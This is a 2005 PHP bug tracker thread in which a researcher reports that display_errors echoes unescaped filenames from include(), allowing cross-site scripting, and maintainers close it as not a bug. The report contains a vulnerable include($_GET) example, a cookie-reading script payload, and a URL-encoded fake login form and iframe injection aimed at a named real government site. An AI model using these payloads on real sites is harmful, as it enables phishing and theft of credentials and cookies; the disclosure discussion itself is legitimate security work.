ID: 33173 Updated by: [EMAIL PROTECTED] Reported By: max at jestsuper dot pl Status: Bogus Bug Type: *General Issues Operating System: * PHP Version: * New Comment:
Here we have two errors: a) letting unchecked data be used as filename b) showing plain errors to the user about a) _every_ input data needs to be checked. Or we would need to remove eval since some user might do a eval($_GET['code']) about b) as Marcus wrote you shouldn't show plain error messages to your users. This for two reasons: first the user doesn't understand what's wrong and might think he's to stupid and second for a bit of security, if the some bad guy doesn't know where a GET-value is used he has limited chance in finding an exploit. And a further note: changing the filename for the error message might also make debugging harder since the name shown isn't exactly the one used so it might be harder to track the reason Previous Comments: ------------------------------------------------------------------------ [2005-05-30 18:56:29] max at jestsuper dot pl -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > ID: 33173 > Updated by: [EMAIL PROTECTED] > Reported By: max at jestsuper dot pl > -Status: Open > +Status: Bogus > Bug Type: *General Issues > -Operating System: FreeBSD > +Operating System: * > -PHP Version: 4.3.11 > +PHP Version: * > New Comment: > > Thank you for taking the time to write to us, but this is not > a bug. This is bug [XSS]. > Please double-check the documentation available at > http://www.php.net/manual/ and the instructions on how to report > a bug at http://bugs.php.net/how-to-report.php Ok. But this bug still exists, if (html_errors false) etc. > > You're not supposed to pass the error information to your users. Show > erros is only a convenience thing to aid you while developing. Thus no > user will ever see such error messages. So in the end it is not usable > for phishing and alike. Is is.. ;] That can be very dangers. For example phishing. This is XSS! So ok. Example newweb.wrh.noaa.gov http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=%3CP%3E%3Cfont%20color=red%3E%3CP%3E%3Ch1%3EWARNING!%20SYSTEM%20ERROR%3CBR%3EPlease%20login: %3C/h1%3E%3C/font%3E%3Cfont%20size=-4%3E%3C/center%3E%20%3CFORM%20METHOD=POST%20ACTION=mailto:[EMAIL PROTECTED]: %3CINPUT%20TYPE=text%20NAME=login%20SIZE=9%3E%3CP%3EPASSWORD: %3CINPUT%20TYPE=password%20NAME=passwd%20SIZE=9%3E%3CP%3E%3Cinput%20type=submit%20name=go%20value=Login%3E%3C/form%3E%3Cfont%20color=white%3E http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=<iframe src=http://newweb.wrh.noaa.gov> But php errors (Warning) can be in a BANK site... and can you create form ... phishing! Tell me what is wrong. Thx SecurityResason.Com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (FreeBSD) iD8DBQFCmjvuznmvyJCR4zQRApfYAKCHEknKWRw8zchV6qIwkM0DZt9JNQCfRvcm IDvuoOSzh75uSA9A1xnFiYc= =S4rb -----END PGP SIGNATURE----- ------------------------------------------------------------------------ [2005-05-28 19:02:37] [EMAIL PROTECTED] Thank you for taking the time to write to us, but this is not a bug. Please double-check the documentation available at http://www.php.net/manual/ and the instructions on how to report a bug at http://bugs.php.net/how-to-report.php You're not supposed to pass the error information to your users. Show erros is only a convenience thing to aid you while developing. Thus no user will ever see such error messages. So in the end it is not usable for phishing and alike. ------------------------------------------------------------------------ [2005-05-28 16:57:51] max at jestsuper dot pl Description: ------------ -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Author: cXIb8O3(Maksymilian Arciemowicz) Date: 28.5.2005 from securityreason.com TEAM - --- 0. Bug in PHP 4.3.11 display_error. --- This bug can be danger, because someone can do xss and Phishing attack. Problem exist in display_errors.. Example php script: <?php include($_GET['varible']); ?> and now request is ?varible=XXX so can we see any error. - --- Warning: main(XXX): failed to open stream: No such file or directory in /www/dupa.php on line 2 Warning: main(): Failed opening 'XXX' for inclusion (include_path='.:') in /www/dupa.php on line 2 - --- Normal. But now varible have for example <h1>SR</h1> And error messages is: - --- Warning: main( SR ): failed to open stream: No such file or directory in /www/dupa.php on line 2 Warning: main(): Failed opening '<h1>SR</h1>' for inclusion (include_path='.:') in /www/dupa.php on line 2 - --- So XSS... Danger can be tag <script> <iframe>, because you can see cookies etc. For example. ?varible=<script>alert(document.cookie);</script> And have you cookies from this domain! This XSS is critical, because exist in display_error and hacker can do XSS and Phishing attack. For example, if this bug exist in a Bank site... hacker can create <FORM> or mirror site... - --- 1.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: securityreason.com TEAM -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (FreeBSD) iD8DBQFCmIWvznmvyJCR4zQRAuqtAKCcyXWQnMdPvCn+6+npQiGEbXvAZwCgq172 +J8w9EzGFE49sXxP1MPbSfI= =QksY -----END PGP SIGNATURE----- Actual result: -------------- XSS ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=33173&edit=1
